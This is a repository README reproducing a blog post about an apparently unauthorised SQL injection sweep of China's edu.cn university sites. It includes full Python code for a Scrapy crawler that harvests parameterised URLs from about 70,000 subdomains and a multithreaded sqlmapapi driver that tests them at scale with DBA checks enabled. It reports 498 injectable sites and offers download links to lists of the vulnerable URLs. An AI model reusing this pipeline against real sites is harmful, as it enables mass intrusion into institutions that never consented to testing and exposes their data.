A simple SQL injection scan of China's edu.cn domains, done over the summer break; best read alongside [this post](https://blog.fiht.me/archives/60/). The basic model is done and all that remains is a bash script, but my energy is limited, so I will not write it up here. If you are interested, leave an issue and I will reply when I see it.
## About open use
The framework used here is fairly mature by now, but it is helpless against forms and AJAX, so a refactor is under consideration. Thanks for your interest.
Since the blog was recently reorganized, the original post is pasted below:


---
title: An SQL injection scan of edu.cn domains nationwide
date: 2016-11-22 12:06:59
tags: [SQL injection, scanner]
categories: Cyberspace security
---
Everything in this post is purely fictional; I take no responsibility for its accuracy or for the validity of the data.
<!-- more -->
# Notes on scanning the whole of edu.cn

Summer break left me with time to spare, so I completed this SQL injection scan of the entire education network, the edu.cn domain. This post describes how the scan was put together and the tools and code used along the way.
## The results first
1. 959 edu.cn top-level domains were selected, covering nearly 70,000 second-level domains. About 210,000 valid URLs were tested, and 498 sites were found to contain SQL injection.
2. The crawler module ran on 3 Tencent Cloud servers (16 cores, 16 GB RAM each) for about 3 hours in total, costing nearly 150 RMB.
3. URL testing used a lab server (8 cores, 16 GB RAM) and took about a week.

## Workflow
1. Find the edu.cn domains.
2. Find the subdomains under those domains.
3. Use the crawler module to collect, from each subdomain, the URLs that contain `=`, crawling incrementally (forms and JavaScript are not handled).
4. Test the collected URLs with sqlmapapi.

## Finding the edu.cn domains
Script used: [click_me](#)
This script fetches the edu.cn domains (duplicates are removed; deduplication is not the focus here, so I will not explain it for now).
## Finding the second-level domains of edu.cn
Script used: [click_me](#)
A minimal sketch of the shared normalize-and-deduplicate step is shown below.
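Neither collection script is attached, so as a stand-in, here is a minimal sketch (Python 2, like the rest of the code in this post) of the normalize-and-dedup step. It assumes the raw harvest sits in a plain-text file with one host or URL per line; the file name is hypothetical:
```python
# -*- coding: utf-8 -*-
# Minimal sketch of the dedup step; not the original script.
from urlparse import urlparse  # Python 2 stdlib


def normalize(line):
    """Reduce a raw entry to a bare host, e.g.
    'http://WWW.sdu.edu.cn:80/path' -> 'www.sdu.edu.cn'."""
    line = line.strip().lower()
    if '://' in line:
        line = urlparse(line)[1]  # keep only the netloc
    return line.split(':')[0].rstrip('.')


def dedup(path):
    """Yield each distinct edu.cn host exactly once."""
    seen = set()
    for raw in open(path):
        host = normalize(raw)
        if host.endswith('.edu.cn') and host not in seen:
            seen.add(host)
            yield host


if __name__ == '__main__':
    for host in dedup('raw_subdomains.txt'):  # hypothetical input file
        print host
```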
## The crawler module
The crawler module is built on the Scrapy framework; for how to use Scrapy, see the [official Scrapy site](https://scrapy.org/).
Key code:
1. spider.py
```python
# -*- coding: utf-8 -*-
import pymongo
import scrapy

from edu_scan.items import UrlInjection  # the Item class with 'url' and '_id' fields; module path assumed


class EduSpider(scrapy.Spider):  # class wrapper restored; the original snippet showed only the methods
    name = 'edu'

    def __init__(self):
        '''Pull one record out of Mongo and set its in-progress flag to 1.'''
        db = pymongo.MongoClient('119.29.70.15')['edu_cns']['things']
        things = db.find_one({'scrapyed': {'$exists': False}})
        db.update({'_id': things['_id']}, {'$set': {'scrapyed': '1'}})
        self.start_urls = ['http://%s' % i for i in things['subDomains']]
        self.allowed_domains = [things['host']]
        print(things)
        self.host = things['host']
        self._id = things['_id']

    def parse(self, response):
        """Follow every link and emit the ones that look injectable."""
        if not hasattr(response, 'xpath'):
            return
        for url in response.xpath('//*[@href]/@href').extract():
            url = response.urljoin(url)  # convert to an absolute URL
            yield scrapy.Request(url)
            # A rough check -- badly written, needs refactoring
            if ('=' in url and '?' in url and '.css' not in url
                    and 'javascript:' not in url and 'tree.TreeTempUrl' not in url):
                item = UrlInjection()
                item['url'] = url
                item['_id'] = self._id
                yield item
```
2. The URL filter
Links returned by the spider and queued for crawling are deduplicated here.
```python
from urlparse import urlparse

from scrapy.dupefilters import RFPDupeFilter


class CustomFilter(RFPDupeFilter):
    def __init__(self, path=None, debug=None):
        RFPDupeFilter.__init__(self, path, debug)
        self.fingerprints = {}  # domain -> number of requests seen so far

    def __getid(self, url):
        '''Use the domain as the key.
        example:
            input  http://www.sdu.edu.cn/path/to/file?key1=1&key2=2
            return www.sdu.edu.cn
        '''
        return urlparse(url)[1]

    def request_seen(self, request):
        # Returning True filters the URL out; returning False lets it be crawled.
        fp = self.__getid(request.url)
        if fp not in self.fingerprints:  # this domain has not been crawled yet
            self.fingerprints[fp] = 0
            return False
        if self.fingerprints[fp] < 200:  # crawl at most 200 links per site
            self.fingerprints[fp] += 1
            return False
        return True
```
3. pipeline.py
Processes the items returned by the spider.
```python
import pymongo

from scrapy.conf import settings  # Scrapy 1.x style, matching the 2016-era code


class MongoDBPipeline(object):
    """Deduplicate the crawled URLs, then write them to the database."""

    def __init__(self):
        connection = pymongo.MongoClient(
            settings['MONGODB_SERVER'],
            settings['MONGODB_PORT']
        )
        db = connection[settings['MONGODB_DB']]
        self.collection = db[settings['MONGODB_COLLECTION']]
        self.se = set()  # query paths already stored

    def process_item(self, item, spider):
        url = item['url']
        key = url[:url.find('?')]  # dedup on everything before the '?'
        if key not in self.se:
            # append the URL to this domain's document
            self.collection.update({'_id': item['_id']},
                                   {'$push': {'url': item['url']}})
            self.se.add(key)
        return item
```
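For completeness: the dupefilter and the pipeline above only take effect once they are registered in the project's settings.py. A minimal sketch, assuming a project named edu_scan with module paths to match (the names here are placeholders, not the original project's):
```python
# settings.py -- minimal sketch; project and module names are placeholders
BOT_NAME = 'edu_scan'

# Use the per-domain CustomFilter instead of Scrapy's default fingerprint dedup
DUPEFILTER_CLASS = 'edu_scan.customfilter.CustomFilter'

# Route crawled items through the Mongo pipeline
ITEM_PIPELINES = {'edu_scan.pipelines.MongoDBPipeline': 300}

# Read by MongoDBPipeline via settings[...]; values mirror the ones in spider.py
MONGODB_SERVER = '119.29.70.15'
MONGODB_PORT = 27017
MONGODB_DB = 'edu_cns'
MONGODB_COLLECTION = 'things'
```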
## The injection-point detection module
This module drives sqlmapapi. The code is based on a module I once saw on the Wooyun community; the original author's credit is preserved:
```python
#!/usr/bin/python
# -*- coding:utf-8 -*-

import json
import sys
import threading
import time

import requests
from pymongo import MongoClient

import param  # name -> sqlmapapi REST path constants (task_new, scan_task_start, ...)

reload(sys)
sys.setdefaultencoding('utf-8')

count = 0
MONGO_SERVER = '211.87.234.98'
MONGO_PORT = 27017
MONGO_DATABASE = 'edu_cnResults'
MONGO_COLLECTION = 'urls'
db = MongoClient(MONGO_SERVER, MONGO_PORT)[MONGO_DATABASE][MONGO_COLLECTION]
mutex = threading.Lock()
result_file = open('/tmp/resulttttt', 'w+')


class Autoinj(threading.Thread):
    """
    Create and manage sqlmap tasks through the sqlmapapi interface.
    by zhangh (zhanghang.org#gmail.com)
    modified by fiht (fiht#qq.com)
    """

    def __init__(self, server='', target='', method='', data='', cookie='', referer=''):
        threading.Thread.__init__(self)
        self.server = server
        if self.server[-1] != '/':
            self.server = self.server + '/'
        self.target = ''
        self.taskid = ''
        self.engineid = ''
        self.status = ''
        self.method = method
        self.data = data
        self.referer = referer
        self.cookie = cookie
        self.start_time = time.time()

    def get_target(self):
        """Fetch the next target from the database; file-based input could be added later."""
        mutex.acquire()
        result = db.find_one({'Scaning': {'$exists': False}})
        if result:
            self.target = result['url']
            db.update({'url': result['url']}, {'$set': {'Scaning': 1}})
            print('Testing %s' % self.target)
            mutex.release()
            return True
        else:
            print('No more data to fetch from the database')
            mutex.release()
            return False

    def task_new(self):
        code = requests.get(self.server + param.task_new).text
        self.taskid = json.loads(code)['taskid']
        return True

    def task_delete(self):
        url = self.server + param.task_del
        url = url.replace(param.taskid, self.taskid)
        requests.get(url).json()

    def scan_start(self):
        headers = {'Content-Type': 'application/json'}
        url = self.server + param.scan_task_start
        url = url.replace(param.taskid, self.taskid)
        data = {'url': self.target}
        t = requests.post(url, data=json.dumps(data), headers=headers).json()
        self.engineid = t['engineid']
        return True

    def scan_status(self):
        url = self.server + param.scan_task_status
        url = url.replace(param.taskid, self.taskid)
        self.status = requests.get(url).json()['status']

    def scan_data(self):
        url = self.server + param.scan_task_data
        url = url.replace(param.taskid, self.taskid)
        return requests.get(url).json()

    def option_set(self):
        headers = {'Content-Type': 'application/json'}
        url = self.server + param.option_task_set
        url = url.replace(param.taskid, self.taskid)
        data = {}
        if self.method == "POST":
            data["data"] = self.data
        if len(self.cookie) > 1:
            data["cookie"] = self.cookie
        data['threads'] = 10
        data['smart'] = True
        data['is-dba'] = True
        requests.post(url, data=json.dumps(data), headers=headers)

    def option_get(self):
        url = self.server + param.option_task_get
        url = url.replace(param.taskid, self.taskid)
        return requests.get(url).json()

    def scan_stop(self):
        url = self.server + param.scan_task_stop
        url = url.replace(param.taskid, self.taskid)
        return requests.get(url).json()

    def scan_kill(self):
        url = self.server + param.scan_task_kill
        url = url.replace(param.taskid, self.taskid)
        return requests.get(url).json()

    def start_test(self):
        global count
        # create the task
        self.start_time = time.time()
        if not self.task_new():
            print("Error: task creation failed.")
            return False
        # set the scan options
        self.option_set()
        # start the scan
        if not self.scan_start():
            print("Error: scan start failed.")
            return False
        # wait for the scan to finish
        while True:
            self.scan_status()
            if self.status == 'running':
                time.sleep(40)
            elif self.status == 'terminated':
                break
            else:
                print("unknown status")
                break
            if time.time() - self.start_time > 3000:  # more than 50 minutes
                print('Dropping an unpromising target: %s' % self.target)
                count += 1
                self.scan_stop()
                self.scan_kill()
                return [self.target, 0]

        # fetch the results
        res = self.scan_data()
        # delete the task
        self.task_delete()

        print(res['data'])
        count += 1
        print("Elapsed: " + str(time.time() - self.start_time))
        print('%d URLs tested so far' % count)
        if res['data']:
            return [self.target, res['data'][0]['value'][0]['dbms']]
        else:
            return [self.target, 0]

    def run(self):
        """Keep pulling targets until none are left."""
        while self.get_target():
            try:
                result = self.start_test()
                if result[1]:
                    mutex.acquire()
                    db.update({'url': result[0]},
                              {'$set': {'injection': 1, 'info': result[1]}})
                    print('Found an injectable URL: %s' % self.target)
                    result_file.write(self.target + '--->' + str(result[1]) + '\n')
                    mutex.release()
                else:
                    mutex.acquire()
                    db.update({'url': result[0]}, {'$set': {'injection': 0}})
                    mutex.release()
            except Exception as e:
                print(e)
                break


host_list = ['http://localhost:8775/', 'http://localhost:8776/']


def main():
    # 50 worker threads per sqlmapapi server
    threads = [Autoinj(host) for i in range(50) for host in host_list]
    for thread_ in threads:
        thread_.start()


if __name__ == '__main__':
    main()
```
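The `param` module imported above is not included in the post; it only maps names to sqlmapapi's REST paths, with a placeholder token that the code substitutes via `url.replace(param.taskid, self.taskid)`. A minimal sketch of what it plausibly contained, using sqlmapapi's actual endpoint paths (the placeholder scheme is my guess):
```python
# param.py -- minimal sketch; the original module was not published.
# The names match the attributes used above; the paths are sqlmapapi's
# REST endpoints, with a per-task placeholder swapped in via str.replace().
taskid = '@taskid@'  # placeholder replaced with the real task id

task_new = 'task/new'
task_del = 'task/%s/delete' % taskid
scan_task_start = 'scan/%s/start' % taskid
scan_task_stop = 'scan/%s/stop' % taskid
scan_task_kill = 'scan/%s/kill' % taskid
scan_task_status = 'scan/%s/status' % taskid
scan_task_data = 'scan/%s/data' % taskid
option_task_get = 'option/%s/get' % taskid
option_task_set = 'option/%s/set' % taskid
```
Each entry in host_list is just a running sqlmapapi server; one can be started from a sqlmap checkout with `python sqlmapapi.py -s -p 8775`.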
## Resources
**For scientific research only; do not put these to other uses**
[Domain dump for each university](#)
[The 210k URLs](#)
[URLs containing injection points](#)

Now for some interesting tidbits:
1. Subdomain counts per university:
<iframe style="width: 100%; height: 100%" src="http://www.tubiaoxiu.com/p.html?s=bd3cb7edaad1db64"></iframe>
Shandong University's main domain turns out to have the most subdomains, more than 900.
2. SQL injection point counts per university:
<iframe style="width: 100%; height: 100%" src="http://www.tubiaoxiu.com/p.html?s=94fe130e9d6a82e2"></iframe>

3. Distribution of database types behind the SQL injections:
<iframe style="width: 100%; height: 100%" src="http://www.tubiaoxiu.com/p.html?s=7258f3b0690d082f"></iframe>